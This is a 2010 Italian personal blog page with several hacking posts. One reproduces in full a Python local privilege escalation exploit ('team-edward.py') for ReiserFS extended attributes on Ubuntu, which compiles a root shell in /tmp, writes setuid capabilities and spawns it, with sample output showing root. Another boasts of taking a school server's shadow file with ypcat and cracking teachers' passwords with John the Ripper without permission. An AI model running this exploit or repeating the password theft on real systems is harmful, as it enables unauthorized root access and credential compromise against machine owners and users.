Menu Principale
Statistiche
Utenti : 12
Contenuti : 24
Link web : 6
Tot. visite contenuti : 4174
Login



Home

Nuovo Portale Realizzazione Siti Internet

PostDateIcon Lunedì 26 Luglio 2010 07:05 | PostAuthorIcon Author: Vincenzi Massimo | PDF Stampa E-mail

Ultimo aggiornamento ( Lunedì 26 Luglio 2010 07:06 )

 

KP500

PostDateIcon Giovedì 20 Maggio 2010 19:59 | PostAuthorIcon Author: Vincenzi Massimo | PDF Stampa E-mail

Hackkato il tema del cellulare KP500

Quanti come me hanno il cellulare LG KP500 ??
A Quanti da fastidio il suono della fotocamera e della batteria scarica anche se il cell è in silenzioso ??
Oggi ho trovato finalmente il modo di estrarre dal telefono la partizione e modificarla.

GUIDA ONLINE !!!!

SCARICA QUI


Buon hacking a tutti.

Ultimo aggiornamento ( Sabato 22 Maggio 2010 11:16 )

 

Password Planck

PostDateIcon Mercoledì 19 Maggio 2010 15:56 | PostAuthorIcon Author: Vincenzi Massimo | PDF Stampa E-mail

Insolita scoperta all' ITIS PLANCK


D: Chi sono gli utenti della rete con le password più fragili ?
R: Strano ma vero, sono.... i DOCENTI !!!. Qualche giorno fà con ypcat è stata presa in prestito la shadow di serlinux3,
passata poi al setaccio con john the ripper.
28 delle 53 Password trovate a complessità nulla, risultano essere dei docenti.
Questo solo per dimostrare come la sicurezza, per quanto efficace essa sia, possa essere vanificata da utenti non proprio attenti.

Ultimo aggiornamento ( Mercoledì 19 Maggio 2010 16:01 )

 

Privileges Escalation 9.04

PostDateIcon Martedì 18 Maggio 2010 12:37 | PostAuthorIcon Author: Vincenzi Massimo | PDF Stampa E-mail

Privileges Escalation on Ubuntu 9.04

Kernel 2.6.28-15


Questa volta l'errore si trova in PulseAudio.
Eh già è grave questa cosa...
Questo BUG permette a qualsiasi utente di ottenere una shell di root.
Il codice sorgente verrà pubblicato a breve, appena si troverà una soluzione al bug.

Per ulteriori info - Questo indirizzo e-mail è protetto dallo spam bot. Abilita Javascript per vederlo.

 

Un altro privileges escalation 9.10JJ

PostDateIcon Lunedì 17 Maggio 2010 15:03 | PostAuthorIcon Author: Vincenzi Massimo | PDF Stampa E-mail
Ebbene si... Trovato un altro bug nella distribuzione GNU/Linux Ubuntu 9.10 JJ
Vediamolo nello specifico:

#!/usr/bin/env python


Information:

https://bugzilla.redhat.com/show_bug.cgi?id=568041

The kernel allows processes to access the internal ".reiserfs_priv"
directory at the top of a reiserfs filesystem which is used to store
xattrs. Permissions are not enforced in that tree, so unprivileged
users can view and potentially modify the xattrs on arbitrary files.

Usage:

$ python team-edward.py
[+] checking for reiserfs mount with user_xattr mount option
[+] checking for private xattrs directory at /.reiserfs_priv/xattrs
[+] preparing shell in /tmp
[+] capturing pre-shell snapshot of private xattrs directory
[+] compiling shell in /tmp
[+] setting dummy xattr to get reiserfs object id
[+] capturing post-shell snapshot of private xattrs directory
[+] found 1 new object ids
[+] setting cap_setuid/cap_setgid capabilities on object id 192B.1468
[+] spawning setuid shell...
# id
uid=0(root) gid=0(root) groups=4(adm), ...

Notes:

Obviously requires a ReiserFS filesystem mounted with extended attributes.
Tested on Ubuntu Jaunty 9.10.
'''
import os, sys

SHELL = 'int main(void) { setgid(0); setuid(0); execl("/bin/sh", "sh", 0); }'
XATTR =
'\x41\x58\x46\x52\xc1\x00\x00\x02\x01\x00\x00\x0
\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'

def err(txt):
print '[-] error: %s' % txt
sys.exit(1)

def msg(txt):
print '[+] %s' % txt

def main():
msg('checking for reiserfs mount with user_xattr mount option')

f = open('/etc/fstab')
for line in f:
if 'reiserfs' in line and 'user_xattr' in line:
break
else:
err('failed to find a reiserfs mount with user_xattr')
f.close()

msg('checking for private xattrs directory at /.reiserfs_priv/xattrs')

if not os.path.exists('/.reiserfs_priv/xattrs'):
err('failed to locate private xattrs directory')

msg('preparing shell in /tmp')

f = open('/tmp/team-edward.c', 'w')
f.write(SHELL)
f.close()

msg('capturing pre-shell snapshot of private xattrs directory')

pre = set(os.listdir('/.reiserfs_priv/xattrs'))

msg('compiling shell in /tmp')

ret = os.system('gcc -w /tmp/team-edward.c -o /tmp/team-edward')
if ret != 0:
err('error compiling shell, you need gcc')

msg('setting dummy xattr to get reiserfs object id')

os.system('setfattr -n "user.hax" -v "hax" /tmp/team-edward')
if ret != 0:
err('error setting xattr, you need setfattr')

msg('capturing post-shell snapshot of private xattrs directory')

post = set(os.listdir('/.reiserfs_priv/xattrs'))

objs = post.difference(pre)

msg('found %s new object ids' % len(objs))

for obj in objs:
msg('setting cap_setuid/cap_setgid capabilities on object id %s' % obj)

f = open('/.reiserfs_priv/xattrs/%s/security.capability' % obj, 'w')
f.write(XATTR)
f.close()

msg('spawning setuid shell...')

os.system('/tmp/team-edward')

if __name__ == '__main__':
main()

Ultimo aggiornamento ( Lunedì 17 Maggio 2010 15:08 )

 

<< Inizio < Prec. 1 2 3 Succ. > Fine >>

Pagina 1 di 3

feed-image

Copyright © 2009 ---.
All Rights Reserved.

info@steblar.com